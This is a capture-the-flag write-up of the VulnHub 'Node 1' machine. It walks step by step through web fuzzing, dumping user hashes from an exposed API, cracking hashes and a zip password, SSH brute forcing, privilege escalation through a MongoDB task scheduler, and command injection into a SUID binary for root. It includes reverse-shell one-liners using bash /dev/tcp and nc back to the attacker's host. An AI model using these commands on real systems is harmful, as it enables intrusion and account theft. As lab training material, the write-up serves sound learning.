Recon

TCP/3000 (HTTP)

FFUF

┌──(root💀kali)-[~/vulnHub/Node-1]
└─# ffuf -u http://$ip:3000/FUZZ -w /usr/share/wordlists/dirb/common.txt -e '.html,.txt,.php,.cgi,.log' -fw 727

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.110.40:3000/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/common.txt
 :: Extensions       : .html .txt .php .cgi .log 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response words: 727
________________________________________________

assets                  [Status: 301, Size: 171, Words: 7, Lines: 10]
uploads                 [Status: 301, Size: 173, Words: 7, Lines: 10]
vendor                  [Status: 301, Size: 171, Words: 7, Lines: 10]
:: Progress: [27690/27690] :: Job [1/1] :: 1985 req/sec :: Duration: [0:00:19] :: Errors: 0 ::

Initial Foothold

TCP/3000 (HTTP) - Insecure Web Application

Proceed to the website
- There is a login page
Proceed to /login, determine if page is susceptible to SQLi Auth Bypass
- Failed
Intercept w/ burpsuite
- /api/session/authenticate is queried
- JSON Request
View files that are queried on this website
- Inspect Element -> Sources -> js -> app -> controllers
  - Files in /api directory is being queried

Enumerate files/dirs in /api

 ┌──(root💀kali)-[~/vulnHub/Node-1]
 └─# ffuf -u http://$ip:3000/api/FUZZ -w /usr/share/wordlists/dirb/common.txt -e '.html,.txt,.php,.cgi,.log' -fw 727

         /'___\  /'___\           /'___\       
        /\ \__/ /\ \__/  __  __  /\ \__/       
        \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
         \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
          \ \_\   \ \_\  \ \____/  \ \_\       
           \/_/    \/_/   \/___/    \/_/       

        v1.3.1 Kali Exclusive <3
 ________________________________________________

  :: Method           : GET
  :: URL              : http://192.168.110.40:3000/api/FUZZ
  :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/common.txt
  :: Extensions       : .html .txt .php .cgi .log 
  :: Follow redirects : false
  :: Calibration      : false
  :: Timeout          : 10
  :: Threads          : 40
  :: Matcher          : Response status: 200,204,301,302,307,401,403,405
  :: Filter           : Response words: 727
 ________________________________________________

 session                 [Status: 200, Size: 23, Words: 1, Lines: 1]
 users                   [Status: 200, Size: 611, Words: 1, Lines: 1]
 :: Progress: [27690/27690] :: Job [1/1] :: 1191 req/sec :: Duration: [0:00:17] :: Errors: 0 ::

View enumerated directories

session

users

  ┌──(root💀kali)-[~/vulnHub/Node-1]
  └─# curl -s $ip:3000/api/users | python -m json.tool
  [
      {
          "_id": "59a7365b98aa325cc03ee51c",
          "is_admin": true,
          "password": "dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af",
          "username": "myP14ceAdm1nAcc0uNT"
      },
      {
          "_id": "59a7368398aa325cc03ee51d",
          "is_admin": false,
          "password": "f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240",
          "username": "tom"
      },
      {
          "_id": "59a7368e98aa325cc03ee51e",
          "is_admin": false,
          "password": "de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73",
          "username": "mark"
      },
      {
          "_id": "59aa9781cced6f1d1490fce9",
          "is_admin": false,
          "password": "5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0",
          "username": "rastating"
      }
  ]

Credentials obtained

Extract usernames, passwords

 ┌──(root💀kali)-[~/vulnHub/Node-1]
 └─# curl -s $ip:3000/api/users | python -m json.tool | grep pass | cut -d ':' -f2 | sed 's/\",//g' | cut -d '"' -f2 |tee hashes.txt
 dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af
 f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240
 de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73
 5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0

 ┌──(root💀kali)-[~/vulnHub/Node-1]
 └─# curl -s $ip:3000/api/users | python -m json.tool | grep user | cut -d ':' -f2 | sed 's/\",//g' | cut -d '"' -f2 |tee usernames
 myP14ceAdm1nAcc0uNT
 tom
 mark
 rastating

Crack hashes

 ┌──(root💀kali)-[~/vulnHub/Node-1]
 └─# hashcat -a 0 -m 1400 hashes.txt /usr/share/wordlists/rockyou.txt  --show
 dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af:manchester
 f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240:spongebob
 de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73:snowflake
	
 ┌──(root💀kali)-[~/vulnHub/Node-1]
 └─# hashcat -a 0 -m 1400 hashes.txt /usr/share/wordlists/rockyou.txt  --show | cut -d ':' -f2 | tee passwords.txt
 manchester
 spongebob
 snowflake
	
 ┌──(root💀kali)-[~/vulnHub/Node-1/192.168.110.40/exploit]
 └─# paste -d ':' usernames passwords.txt | tee hydra_creds.txt
 myP14ceAdm1nAcc0uNT:manchester
 tom:spongebob
 mark:snowflake
 rastating:

TCP/22 (SSH) - Bruteforce

Tried to SSH w/ our creds, failed

 ┌──(root💀kali)-[~/vulnHub/Node-1/192.168.110.40/exploit]
 └─# hydra -C hydra_creds.txt -e nsr ssh://$ip
 Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

 Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-03-13 18:29:24
 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
 [DATA] max 16 tasks per 1 server, overall 16 tasks, 16 login tries, ~1 try per task
 [DATA] attacking ssh://192.168.110.40:22/
 1 of 1 target completed, 0 valid password found
 Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-03-13 18:29:26

TCP/3000 (HTTP)

Login into web application w/ myP14ceAdm1nAcc0uNT:manchester & download Backup
- Only myP14ceAdm1nAcc0uNT:manchester is an admin account, the rest are ordinary accounts

Analyze myplace.backup

Find out what kind of file it is

 ┌──(root💀kali)-[~/vulnHub/Node-1/192.168.110.40/exploit]
 └─# file myplace.backup 
 myplace.backup: ASCII text, with very long lines (65536), with no line terminators

ASCII text

View contents

 ....
 AAAAAAEAAAAAFBLBQYAAAAAXwNfA3edAQDQ+iUAAAA=

= is a padding used in base64

Decode the content of myplace.backup

 ┌──(root💀kali)-[~/vulnHub/Node-1/192.168.110.40/exploit]
 └─# cat myplace.backup | base64 -d > decoded_myplace.backup 

Find out what kind of file it is

 ┌──(root💀kali)-[~/vulnHub/Node-1/192.168.110.40/exploit]
 └─# file decoded_myplace.backup 
 decoded_myplace.backup: Zip archive data, at least v1.0 to extract, compression method=store

.zip file

Extract it

 ┌──(root💀kali)-[~/vulnHub/Node-1/192.168.110.40/exploit]
 └─# mv decoded_myplace.backup decoded_myplace.zip
 ┌──(root💀kali)-[~/vulnHub/Node-1/192.168.110.40/exploit]
 └─# unzip decoded_myplace.zip 
 Archive:  decoded_myplace.zip
    creating: var/www/myplace/
 [decoded_myplace.zip] var/www/myplace/package-lock.json password: 

Password protected

Crack zip file

Crack zip file w/ fcrackzip

 ┌──(root💀kali)-[~/vulnHub/Node-1/192.168.110.40/exploit]
 └─# fcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt decoded_myplace.zip 
 'var/www/myplace/' is not encrypted, skipping
 found file 'var/www/myplace/package-lock.json', (size cp/uc   4404/ 21264, flags 9, chk 0145)
 'var/www/myplace/node_modules/' is not encrypted, skipping
 'var/www/myplace/node_modules/serve-static/' is not encrypted, skipping
 found file 'var/www/myplace/node_modules/serve-static/README.md', (size cp/uc   2733/  7508, flags 9, chk 1223)
 found file 'var/www/myplace/node_modules/serve-static/index.js', (size cp/uc   1640/  4533, flags 9, chk b964)
 found file 'var/www/myplace/node_modules/serve-static/LICENSE', (size cp/uc    697/  1189, flags 9, chk 1020)
 found file 'var/www/myplace/node_modules/serve-static/HISTORY.md', (size cp/uc   2625/  8504, flags 9, chk 35bd)
 found file 'var/www/myplace/node_modules/serve-static/package.json', (size cp/uc    868/  2175, flags 9, chk 0145)
 'var/www/myplace/node_modules/utils-merge/' is not encrypted, skipping
 found file 'var/www/myplace/node_modules/utils-merge/README.md', (size cp/uc    344/   634, flags 9, chk 9f17)
 found file 'var/www/myplace/node_modules/utils-merge/index.js', (size cp/uc    219/   381, flags 9, chk 9e03)
 8 file maximum reached, skipping further files


 PASSWORD FOUND!!!!: pw == magicword

Unzip decoded_myplace.zip

 ┌──(root💀kali)-[~/vulnHub/Node-1/192.168.110.40/exploit]
 └─# unzip decoded_myplace.zip 
 Archive:  decoded_myplace.zip
    creating: var/www/myplace/
 [decoded_myplace.zip] var/www/myplace/package-lock.json password: magicword

/var contains the files of the entire web application
After browsing through the files, SSH credentials in app.js
- MongoDB database
- mark:5AYRft73VtFpc84k

TCP/22 (SSH)

SSH w/ mark:5AYRft73VtFpc84k

Privilege Escalation

Tom - Via Insecure Application

View files in Tom’s home directory

 mark@node:/home/tom$ ls -la
 total 40
 drwxr-xr-x 6 root root 4096 Sep  3  2017 .
 drwxr-xr-x 5 root root 4096 Aug 31  2017 ..
 -rw-r--r-- 1 root root  220 Aug 29  2017 .bash_logout
 -rw-r--r-- 1 root root 3771 Aug 29  2017 .bashrc
 drwx------ 2 root root 4096 Aug 29  2017 .cache
 drwxr-xr-x 3 root root 4096 Aug 30  2017 .config
 -rw-r----- 1 root root    0 Sep  3  2017 .dbshell
 -rwxr-xr-x 1 root root    0 Aug 30  2017 .mongorc.js
 drwxrwxr-x 2 root root 4096 Aug 29  2017 .nano
 drwxr-xr-x 5 root root 4096 Aug 31  2017 .npm
 -rw-r--r-- 1 root root  655 Aug 29  2017 .profile
 -rw-r----- 1 root tom    33 Sep  3  2017 user.txt
 mark@node:/home/tom$ 

User Flag is there, we have to privilege escalate to Tom.

Linpeas
- /usr/bin/node /var/scheduler/app.js
  - Unknown application running
- /usr/bin/node /var/www/myplace/app.js
  - Web application currently running

View contents of /var/scheduler/app.js

 mark@node:/home/tom$ cat /var/scheduler/app.js
 const exec        = require('child_process').exec;
 const MongoClient = require('mongodb').MongoClient;
 const ObjectID    = require('mongodb').ObjectID;
 const url         = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/scheduler?authMechanism=DEFAULT&authSource=scheduler';

 MongoClient.connect(url, function(error, db) {
   if (error || !db) {
     console.log('[!] Failed to connect to mongodb');
     return;
   }

   setInterval(function () {
     db.collection('tasks').find().toArray(function (error, docs) {
       if (!error && docs) {
         docs.forEach(function (doc) {
           if (doc) {
             console.log('Executing task ' + doc._id + '...');
             exec(doc.cmd);
             db.collection('tasks').deleteOne({ _id: new ObjectID(doc._id) });
           }
         });
       }
       else if (error) {
         console.log('Something went wrong: ' + error);
       }
     });
   }, 30000);

 });

Scheduler app is connecting to the MongoDB database w/ Mark’s credentials periodically,
Retreiving a value called cmd from the task collection,
Executing cmd and
Deleting the cmd value from task collection after executing it
Since this application is started by Tom, the command executed will be executed as Tom allowing us to privilege escalate.

To exploit this, we add a value into cmd from task collection, that will execute a reverse shell, allowing us privilege escalate to Tom

Exploiting the vulnerability

Connect to MongoDB w/ Mark’s credentials

 mark@node:/home/tom$ mongo -u mark -p 5AYRft73VtFpc84k  scheduler
 MongoDB shell version: 3.2.16
 connecting to: scheduler
 > show collections
 tasks

Create reverse shell payload

 mark@node:/tmp$ printf '#!/bin/bash\n\n /bin/bash -i >& /dev/tcp/192.168.110.4/4444 0>&1\n' > exploit; chmod 4777 exploit;

Add value into cmd from task collection that will execute our reverse shell payload we just created
1 2 db.tasks.insert( {_id: 0, cmd: "/tmp/exploit"} ) WriteResult({ "nInserted" : 1 })
Successfully privilege escalate to Tom

User Flag

 tom@node:~$ cat user.txt
 cat user.txt
 e1156acc3574e04b06908ecf76be91b1
 tom@node:~$ 

Root - Via SUID Binary + Insecure Application

Enumerate SUID files

 tom@node:~$ find / -perm -4000 2>/dev/null
 /usr/lib/eject/dmcrypt-get-device
 /usr/lib/snapd/snap-confine
 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
 /usr/lib/openssh/ssh-keysign
 /usr/lib/policykit-1/polkit-agent-helper-1
 /usr/local/bin/backup
 /usr/bin/chfn
 /usr/bin/at
 /usr/bin/gpasswd
 /usr/bin/newgidmap
 /usr/bin/chsh
 /usr/bin/sudo
 /usr/bin/pkexec
 /usr/bin/newgrp
 /usr/bin/passwd
 /usr/bin/newuidmap
 /tmp/tombash
 /tmp/exploit
 /bin/ping
 /bin/umount
 /bin/fusermount
 /bin/ping6
 /bin/ntfs-3g
 /bin/su
 /bin/mount

/usr/local/bin/backup

View contents of

 tom@node:/tmp$ strings /usr/local/bin/backup
 /lib/ld-linux.so.2
 libc.so.6
 _IO_stdin_used
 setuid
 strcpy
 exit
 sprintf
 srand
 fopen
 strncpy
 puts
 time
 clock
 getpid
 fgets
 strstr
 strcspn
 fclose
 strcat
 remove
 system
 geteuid
 strchr
 access
 strcmp
 __libc_start_main
 __gmon_start__
 GLIBC_2.1
 GLIBC_2.0
 PTRh 
 WVSQ
 Y[^_]
 UWVS
 t$,U
 [^_]
 [37m
 [33m
  %s[!]%s %s
 [32m
  %s[+]%s %s
  %s[+]%s Starting archiving %s
              ____________________________________________________
             /                                                    \
            |    _____________________________________________     |
            |   |                                             |    |
            |   |             Secure Backup v1.0              |    |
            |   |_____________________________________________|    |
            |                                                      |
             \_____________________________________________________/
                    \_______________________________________/
                 _______________________________________________
              _-'    .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.  --- `-_
           _-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--.  .-.-.`-_
        _-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_
     _-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_
  _-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_
 :-----------------------------------------------------------------------------:
 `---._.-----------------------------------------------------------------._.---'
 Could not open file
 Validated access token
 Ah-ah-ah! You didn't say the magic word!
 Finished! Encoded backup is below:
 UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbBKBl0rFrayqfbwJ2YyHunnYq1Za6G7XLo8C3RH/hu0fArpSvYauq4AUycRmLuWvPyJk3sF+HmNMciNHfFNLD3LdkGmgwSW8j50xlO6SWiH5qU1Edz340bxpSlvaKvE4hnK/oan4wWPabhw/2rwaaJSXucU+pLgZorY67Q/Y6cfA2hLWJabgeobKjMy0njgC9c8cQDaVrfE/ZiS1S+rPgz/e2Pc3lgkQ+lAVBqjo4zmpQltgIXauCdhvlA1Pe/BXhPQBJab7NVF6Xm3207EfD3utbrcuUuQyF+rQhDCKsAEhqQ+Yyp1Tq2o6BvWJlhtWdts7rCubeoZPDBD6Mejp3XYkbSYYbzmgr1poNqnzT5XPiXnPwVqH1fG8OSO56xAvxx2mU2EP+Yhgo4OAghyW1sgV8FxenV8p5c+u9bTBTz/7WlQDI0HUsFAOHnWBTYR4HTvyi8OPZXKmwsPAG1hrlcrNDqPrpsmxxmVR8xSRbBDLSrH14pXYKPY/a4AZKO/GtVMULlrpbpIFqZ98zwmROFstmPl/cITNYWBlLtJ5AmsyCxBybfLxHdJKHMsK6Rp4MO+wXrd/EZNxM8lnW6XNOVgnFHMBsxJkqsYIWlO0MMyU9L1CL2RRwm2QvbdD8PLWA/jp1fuYUdWxvQWt7NjmXo7crC1dA0BDPg5pVNxTrOc6lADp7xvGK/kP4F0eR+53a4dSL0b6xFnbL7WwRpcF+Ate/Ut22WlFrg9A8gqBC8Ub1SnBU2b93ElbG9SFzno5TFmzXk3onbLaaEVZl9AKPA3sGEXZvVP+jueADQsokjJQwnzg1BRGFmqWbR6hxPagTVXBbQ+hytQdd26PCuhmRUyNjEIBFx/XqkSOfAhLI9+Oe4FH3hYqb1W6xfZcLhpBs4Vwh7t2WGrEnUm2/F+X/OD+s9xeYniyUrBTEaOWKEv2NOUZudU6X2VOTX6QbHJryLdSU9XLHB+nEGeq+sdtifdUGeFLct+Ee2pgR/AsSexKmzW09cx865KuxKnR3yoC6roUBb30Ijm5vQuzg/RM71P5ldpCK70RemYniiNeluBfHwQLOxkDn/8MN0CEBr1eFzkCNdblNBVA7b9m7GjoEhQXOpOpSGrXwbiHHm5C7Zn4kZtEy729ZOo71OVuT9i+4vCiWQLHrdxYkqiC7lmfCjMh9e05WEy1EBmPaFkYgxK2c6xWErsEv38++8xdqAcdEGXJBR2RT1TlxG/YlB4B7SwUem4xG6zJYi452F1klhkxloV6paNLWrcLwokdPJeCIrUbn+C9TesqoaaXASnictzNXUKzT905OFOcJwt7FbxyXk0z3FxD/tgtUHcFBLAQI/AzMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAAAAAAAAAIIC0gQAAAAByb290LnR4dAGZBwACAEFFAQgAUEsFBgAAAAABAAEAQQAAAB4EAAAAAA==
 /root
 /etc
 /tmp/.backup_%i
 /usr/bin/zip -r -P magicword %s %s > /dev/null
 /usr/bin/base64 -w0 %s
 The target path doesn't exist
 ;*2$"
 GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.4) 5.4.0 20160609
 crtstuff.c
 __JCR_LIST__
 deregister_tm_clones
 __do_global_dtors_aux
 completed.7200
 __do_global_dtors_aux_fini_array_entry
 frame_dummy
 __frame_dummy_init_array_entry
 backup.c
 __FRAME_END__
 __JCR_END__
 __init_array_end
 _DYNAMIC
 __init_array_start
 __GNU_EH_FRAME_HDR
 _GLOBAL_OFFSET_TABLE_
 __libc_csu_fini
 strstr@@GLIBC_2.0
 strcmp@@GLIBC_2.0
 _ITM_deregisterTMCloneTable
 __x86.get_pc_thunk.bx
 strcspn@@GLIBC_2.0
 fgets@@GLIBC_2.0
 _edata
 fclose@@GLIBC_2.1
 time@@GLIBC_2.0
 geteuid@@GLIBC_2.0
 strcat@@GLIBC_2.0
 strcpy@@GLIBC_2.0
 getpid@@GLIBC_2.0
 __data_start
 puts@@GLIBC_2.0
 system@@GLIBC_2.0
 clock@@GLIBC_2.0
 __gmon_start__
 exit@@GLIBC_2.0
 __dso_handle
 displaySuccess
 _IO_stdin_used
 srand@@GLIBC_2.0
 strchr@@GLIBC_2.0
 __libc_start_main@@GLIBC_2.0
 displayWarning
 displayTarget
 __libc_csu_init
 fopen@@GLIBC_2.1
 strncpy@@GLIBC_2.0
 _fp_hw
 access@@GLIBC_2.0
 __bss_start
 main
 setuid@@GLIBC_2.0
 _Jv_RegisterClasses
 sprintf@@GLIBC_2.0
 remove@@GLIBC_2.0
 __TMC_END__
 _ITM_registerTMCloneTable
 .symtab
 .strtab
 .shstrtab
 .interp
 .note.ABI-tag
 .note.gnu.build-id
 .gnu.hash
 .dynsym
 .dynstr
 .gnu.version
 .gnu.version_r
 .rel.dyn
 .rel.plt
 .init
 .plt.got
 .text
 .fini
 .rodata
 .eh_frame_hdr
 .eh_frame
 .init_array
 .fini_array
 .jcr
 .dynamic
 .got.plt
 .data
 .bss
 .comment

There is a base64 encoded backup
/usr/bin/zip -r -P magicword %s %s > /dev/null
- Directory we specified will be zipped with password magicword

Earlier, app.js revealed Mark’s credentials, it also contains information about the binary backup
- -q <backup_key> <directory name to backup>

Backup /etc/

 tom@node:/tmp$ backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 /etc/
  [+] Finished! Encoded backup is below:

 UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbBKBl0rFrayqfbwJ2YyHunnYq1Za6G7XLo8C3RH/hu0fArpSvYauq4AUycRmLuWvPyJk3sF+HmNMciNHfFNLD3LdkGmgwSW8j50xlO6SWiH5qU1Edz340bxpSlvaKvE4hnK/oan4wWPabhw/2rwaaJSXucU+pLgZorY67Q/Y6cfA2hLWJabgeobKjMy0njgC9c8cQDaVrfE/ZiS1S+rPgz/e2Pc3lgkQ+lAVBqjo4zmpQltgIXauCdhvlA1Pe/BXhPQBJab7NVF6Xm3207EfD3utbrcuUuQyF+rQhDCKsAEhqQ+Yyp1Tq2o6BvWJlhtWdts7rCubeoZPDBD6Mejp3XYkbSYYbzmgr1poNqnzT5XPiXnPwVqH1fG8OSO56xAvxx2mU2EP+Yhgo4OAghyW1sgV8FxenV8p5c+u9bTBTz/7WlQDI0HUsFAOHnWBTYR4HTvyi8OPZXKmwsPAG1hrlcrNDqPrpsmxxmVR8xSRbBDLSrH14pXYKPY/a4AZKO/GtVMULlrpbpIFqZ98zwmROFstmPl/cITNYWBlLtJ5AmsyCxBybfLxHdJKHMsK6Rp4MO+wXrd/EZNxM8lnW6XNOVgnFHMBsxJkqsYIWlO0MMyU9L1CL2RRwm2QvbdD8PLWA/jp1fuYUdWxvQWt7NjmXo7crC1dA0BDPg5pVNxTrOc6lADp7xvGK/kP4F0eR+53a4dSL0b6xFnbL7WwRpcF+Ate/Ut22WlFrg9A8gqBC8Ub1SnBU2b93ElbG9SFzno5TFmzXk3onbLaaEVZl9AKPA3sGEXZvVP+jueADQsokjJQwnzg1BRGFmqWbR6hxPagTVXBbQ+hytQdd26PCuhmRUyNjEIBFx/XqkSOfAhLI9+Oe4FH3hYqb1W6xfZcLhpBs4Vwh7t2WGrEnUm2/F+X/OD+s9xeYniyUrBTEaOWKEv2NOUZudU6X2VOTX6QbHJryLdSU9XLHB+nEGeq+sdtifdUGeFLct+Ee2pgR/AsSexKmzW09cx865KuxKnR3yoC6roUBb30Ijm5vQuzg/RM71P5ldpCK70RemYniiNeluBfHwQLOxkDn/8MN0CEBr1eFzkCNdblNBVA7b9m7GjoEhQXOpOpSGrXwbiHHm5C7Zn4kZtEy729ZOo71OVuT9i+4vCiWQLHrdxYkqiC7lmfCjMh9e05WEy1EBmPaFkYgxK2c6xWErsEv38++8xdqAcdEGXJBR2RT1TlxG/YlB4B7SwUem4xG6zJYi452F1klhkxloV6paNLWrcLwokdPJeCIrUbn+C9TesqoaaXASnictzNXUKzT905OFOcJwt7FbxyXk0z3FxD/tgtUHcFBLAQI/AzMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAAAAAAAAAIIC0gQAAAAByb290LnR4dAGZBwACAEFFAQgAUEsFBgAAAAABAAEAQQAAAB4EAAAAAA==

Decode & unzip

 ┌──(root💀kali)-[~/vulnHub/Node-1/192.168.110.40/loot]
 └─# 7z e decoded.zip 

 ┌──(root💀kali)-[~/vulnHub/Node-1/192.168.110.40/loot]
 └─# cat root.txt 
 QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
 QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
 QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
 QQQQQQQQQQQQQQQQQQQWQQQQQWWWBBBHHHHHHHHHBWWWQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
 QQQQQQQQQQQQQQQD!`__ssaaaaaaaaaass_ass_s____.  -~""??9VWQQQQQQQQQQQQQQQQQQQ
 QQQQQQQQQQQQQP'_wmQQQWWBWV?GwwwmmWQmwwwwwgmZUVVHAqwaaaac,"?9$QQQQQQQQQQQQQQ
 QQQQQQQQQQQW! aQWQQQQW?qw#TTSgwawwggywawwpY?T?TYTYTXmwwgZ$ma/-?4QQQQQQQQQQQ
 QQQQQQQQQQW' jQQQQWTqwDYauT9mmwwawww?WWWWQQQQQ@TT?TVTT9HQQQQQQw,-4QQQQQQQQQ
 QQQQQQQQQQ[ jQQQQQyWVw2$wWWQQQWWQWWWW7WQQQQQQQQPWWQQQWQQw7WQQQWWc)WWQQQQQQQ
 QQQQQQQQQf jQQQQQWWmWmmQWU???????9WWQmWQQQQQQQWjWQQQQQQQWQmQQQQWL 4QQQQQQQQ
 QQQQQQQP'.yQQQQQQQQQQQP"       <wa,.!4WQQQQQQQWdWP??!"??4WWQQQWQQc ?QWQQQQQ
 QQQQQP'_a.<aamQQQW!<yF "!` ..  "??$Qa "WQQQWTVP'    "??' =QQmWWV?46/ ?QQQQQ
 QQQP'sdyWQP?!`.-"?46mQQQQQQT!mQQgaa. <wWQQWQaa _aawmWWQQQQQQQQQWP4a7g -WWQQ
 QQ[ j@mQP'adQQP4ga, -????" <jQQQQQWQQQQQQQQQWW;)WQWWWW9QQP?"`  -?QzQ7L ]QQQ
 QW jQkQ@ jWQQD'-?$QQQQQQQQQQQQQQQQQWWQWQQQWQQQc "4QQQQa   .QP4QQQQfWkl jQQQ
 QE ]QkQk $D?`  waa "?9WWQQQP??T?47`_aamQQQQQQWWQw,-?QWWQQQQQ`"QQQD\Qf(.QWQQ
 QQ,-Qm4Q/-QmQ6 "WWQma/  "??QQQQQQL 4W"- -?$QQQQWP`s,awT$QQQ@  "QW@?$:.yQQQQ
 QQm/-4wTQgQWQQ,  ?4WWk 4waac -???$waQQQQQQQQF??'<mWWWWWQW?^  ` ]6QQ' yQQQQQ
 QQQQw,-?QmWQQQQw  a,    ?QWWQQQw _.  "????9VWaamQWV???"  a j/  ]QQf jQQQQQQ
 QQQQQQw,"4QQQQQQm,-$Qa     ???4F jQQQQQwc <aaas _aaaaa 4QW ]E  )WQ`=QQQQQQQ
 QQQQQQWQ/ $QQQQQQQa ?H ]Wwa,     ???9WWWh dQWWW,=QWWU?  ?!     )WQ ]QQQQQQQ
 QQQQQQQQQc-QWQQQQQW6,  QWQWQQQk <c                             jWQ ]QQQQQQQ
 QQQQQQQQQQ,"$WQQWQQQQg,."?QQQQ'.mQQQmaa,.,                . .; QWQ.]QQQQQQQ
 QQQQQQQQQWQa ?$WQQWQQQQQa,."?( mQQQQQQW[:QQQQm[ ammF jy! j( } jQQQ(:QQQQQQQ
 QQQQQQQQQQWWma "9gw?9gdB?QQwa, -??T$WQQ;:QQQWQ ]WWD _Qf +?! _jQQQWf QQQQQQQ
 QQQQQQQQQQQQQQQws "Tqau?9maZ?WQmaas,,    --~-- ---  . _ssawmQQQQQQk 3QQQQWQ
 QQQQQQQQQQQQQQQQWQga,-?9mwad?1wdT9WQQQQQWVVTTYY?YTVWQQQQWWD5mQQPQQQ ]QQQQQQ
 QQQQQQQWQQQQQQQQQQQWQQwa,-??$QwadV}<wBHHVHWWBHHUWWBVTTTV5awBQQD6QQQ ]QQQQQQ
 QQQQQQQQQQQQQQQQQQQQQQWWQQga,-"9$WQQmmwwmBUUHTTVWBWQQQQWVT?96aQWQQQ ]QQQQQQ
 QQQQQQQQQQWQQQQWQQQQQQQQQQQWQQma,-?9$QQWWQQQQQQQWmQmmmmmQWQQQQWQQW(.yQQQQQW
 QQQQQQQQQQQQQWQQQQQQWQQQQQQQQQQQQQga%,.  -??9$QQQQQQQQQQQWQQWQQV? sWQQQQQQQ
 QQQQQQQQQWQQQQQQQQQQQQQQWQQQQQQQQQQQWQQQQmywaa,;~^"!???????!^`_saQWWQQQQQQQ
 QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQWWWWQQQQQmwywwwwwwmQQWQQQQQQQQQQQ
 QQQQQQQWQQQWQQQQQQWQQQWQQQQQWQQQQQQQQQQQQQQQQWQQQQQWQQQWWWQQQQQQQQQQQQQQQWQ

/etc/ & /root is hardcoded into displaying this troll face

Unsure of how to do command injection, had to look at a writeup

The exploit will not work in a pseudo terminal, execute a reverse shell to obtain another shell that is not a pseudo terminal

 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.110.4 4242 >/tmp/f
 ┌──(root💀kali)-[~/vulnHub/Node-1]
 └─# nc -nvlp 4242
 Ncat: Version 7.92 ( https://nmap.org/ncat )
 Ncat: Listening on :::4242
 Ncat: Listening on 0.0.0.0:4242
 Ncat: Connection from 192.168.110.40.
 Ncat: Connection from 192.168.110.40:57888.
 /bin/sh: 0: can't access tty; job control turned off
 $ 

Command Injection
1 $ /usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 "$(echo '/test_dir\n\n/bin/bash\nls')"
- Reference
- Explanation
  Presumably, the binary is using string interpolation to build up a shell command to run. We can use this to our advantage by using command injection. Given we cannot change the output being redirected to /dev/null and given the script will still want to zip up a folder, we will need to pass in a string as the third parameter to the binary executable with multiple \n characters printed to bring about new lines. Then, when /bin/bash is executed we will have root access as the binary runs as root. We add the final command ls so that output our bash session is not redirected to /dev/null.

Root Flag

 cd /root
 ls
 root.txt
 cat root.txt
 1722e99ca5f353b362556a62bd5e6be0

Thoughts:
- Initial foothold is easy/medium,
- The privilege escalation is quite challenging

Vulnhub - Node 1

Recon

TCP/3000 (HTTP)

FFUF

Initial Foothold

